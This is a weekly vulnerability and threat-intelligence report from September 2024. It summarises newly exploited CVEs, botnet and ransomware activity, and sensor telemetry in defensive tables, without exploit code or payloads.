/
/
Critical vulnerabilities amidst Ransomware and Botnet threats

Critical vulnerabilities amidst Ransomware and Botnet threats

September 27, 2024
Executive Summary

In an unexpected turn, this week has only one new vulnerability added to the CISA KEV list, marking a significant drop from last week's addition of 11 CVEs. The lone addition, CVE-2024-7593, is a critical authentication bypass vulnerability affecting Ivanti's Virtual Traffic Manager (vTM). Meanwhile, critical vulnerabilities in Cisco's Smart Licensing Utility and Cellopoint's Secure Email Gateways have gained significant attention, as publicly available proof-of-concept exploits have made these flaws increasingly attractive to threat actors.  

For the third consecutive week, the Mirai botnet has been relentlessly targeting TP-Link Archer AX21 routers, showcasing its tenacity in exploiting consumer devices. At the same time, the Sysrv and Enemy botnets have been observed actively exploiting vulnerabilities in Spring Cloud Gateway, further expanding their reach. Meanwhile, the IoT_Reaper botnet remains active, persistently exploiting an eight-year-old vulnerability in MVPower CCTV DVR models.

Trending / Critical Vulnerabilities

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2024-7593

An authentication bypass vulnerability in Ivanti's Virtual Traffic Manager (vTM) that arises due to an improper authentication algorithm, enables remote attackers to bypass admin panel security measures. With a CVSS score of 9.8 and a high EPSS of 0.97325 along with a readily available proof of concept, it is now added to the CISA KEV list.  

CVE-2024-7490

A critical vulnerability in the Microchip Advanced Software Framework (ASF), affecting versions 3.52.0.2574 and earlier, arises from its implementation of the Tinydhcp server, allowing remote attackers to execute arbitrary code through specially crafted DHCP request packets sent to a multicast address on the affected systems.  

CVE-2024-20439

A critical vulnerability in Cisco Smart Licensing Utility (CSLU) versions 2.0.0, 2.1.0, and 2.2.0 allows unauthenticated attackers to bypass authentication and gain administrative access. This vulnerability arising from a hidden static user credential could lead to attackers manipulating licensing data or launching further attacks within the network. Despite its low EPSS score of 0.16329, the availability of a proof-of-concept exploit for this vulnerability makes it a significant threat.

CVE-2024-9043

A buffer overflow vulnerability in the Cellopoint Secure Email Gateway can be exploited by remote attackers, allowing them to access sensitive email communications, install malware, exfiltrate data, and disable essential security measures, thereby exposing the network to further threats. The existence of proof of concept enhances the risk of exploitation, underscoring the urgent need for immediate remediation.

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Vulnerabilities Product Severity Title Exploited – in-the-wild CISA KEV
CVE-2024-4577 PHP-CGI on Windows High Critical argument injection vulnerability in PHP on Windows servers True True
CVE-2024-36401 GeoServer Critical Code Injection vulnerability in GeoServer leads to remote code execution True True
CVE-2023-4415 Ruijie RG-EW1200G 07161417 r483 High Improper Authentication vulnerability in Ruijie RG-EW1200G 07161417 r483 False False
CVE-2023-4966 D-Link NAS devices Critical Command Injection Vulnerability in D-Link NAS devices True True
CVE-2023-38646 Metabase open source and Metabase Enterprise Critical Remote code execution vulnerability in Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 True True
CVE-2023-26801 LB-LINK Critical Command injection vulnerability in LB-LINK devices True False
CVE-2023-1389 TP-Link Archer AX-21 High Command Injection Vulnerability in TP-Link Archer AX-21 True True
CVE-2022-34045 Wavlink Devices Critical Hardcoded encryption/decryption key vulnerability in Wavlink False False
CVE-2022-30489 Wavlink Devices Medium Cross-site scripting vulnerability in Wavlink Devices False False
CVE-2022-30023 Tenda Devices High Command injection vulnerability via the Ping function in Tenda Products False False
CVE-2022-25168 Apache Hadoop Critical Command injection vulnerability in org.apache.hadoop.fs.FileUtil.unTarUsingTar in Apache Hadoop False False
CVE-2022-41040 Microsoft Exchange Server High Server-Side Request Forgery Vulnerability in Microsoft Exchange Server True True
CVE-2022-22947 Spring Cloud Gateway Critical Remote code execution vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ True True

Vulnerabilities abused by Botnet

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

Vulnerability Product Title Exploit Abused by Botnet
CVE-2023-1389 TP-Link Archer AX21 An unauthenticated command injection vulnerability found in the TP-Link Archer AX21 WiFi router True AGoent,
Gafgyt,
Moobot,
Miori,
Mirai,
Condi
CVE-2022-22947 Spring Cloud Gateway Remote code execution vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ True Enemybot,
GuardMiner,
Sysrv-botnet
CVE-2016-20016 MVPower CCTV DVR models Remote code execution vulnerability in MVPower CCTV DVR models True IoT-Reaper

Vulnerabilities Abused by Malware

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

CVE-2024-36401
Recent investigations by Trend Micro have revealed that an eval injection vulnerability in GeoServer, which can lead to remote code execution, has been actively exploited by the Chinese threat actor Earth Baxia. This group has leveraged the flaw to deploy Cobalt Strike payloads, and a custom backdoor called EAGLEDOOR. Historically, attackers have also exploited this vulnerability to deliver SideWalk malware, a sophisticated backdoor tied to the APT41 threat group. Moreover, the flaw has been used to spread Mirai variants such as JenX and the Condi DDoS bot.

CVE-2024-21338

Sentinel Labs reported that an affiliate group associated with Mallox ransomware has exploited a privilege escalation vulnerability in Windows Kernel, using a Linux-based ransomware tool called Krystina to gain elevated privileges. This strategic use of cross-platform tools enhanced the attackers' ability to deepen system access and amplified the overall impact of their ransomware operations.  

Vulnerability Severity Title Patch Targeted By Malware OSS
CVE-2024-36401 Critical Eval Injection vulnerability in GeoServer leads to remote code execution True Earth Baxia True
CVE-2024-21338 High Privilege Escalation vulnerability in Windows Kernel True Mallox
, Kryptina
False

PRE-NVD observed for this week

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

CVE-ID Type of Vulnerability Product Reference
CVE-2024-9114 Out-Of-Bounds Write FastStone Image Viewer Resource
CVE-2024-9113 Out-Of-Bounds Write FastStone Image Viewer Resource
CVE-2024-8849 Out-Of-Bounds Read PDF-XChange Editor Resource
CVE-2024-8827 Out-Of-Bounds Write PDF-XChange Editor Resource
CVE-2024-8808 Command Injection Cohesive Networks VNS3 Resource

External References

  1. https://www.cisa.gov/news-events/alerts/2024/09/24/cisa-adds-one-known-exploited-vulnerability-catalog
  2. https://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html  
  3. https://www.darkreading.com/cyberattacks-data-breaches/china-earth-baxia-spies-geoserver-apac-orgs  
  4. https://www.sentinelone.com/labs/kryptina-raas-from-unsellable-cast-off-to-enterprise-ransomware/  
  5. https://www.fortinet.com/blog/threat-research/botnets-continue-exploiting-cve-2023-1389-for-wide-scale-spread  
  6. https://thehackernews.com/2024/09/critical-flaw-in-microchip-asf-exposes.html  
  7. https://securityonline.info/researcher-details-cve-2024-20439-cvss-9-8-flaw-in-cisco-smart-licensing-utility/  

Subscribe to our Reports

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Latest Reports

Weekly Reports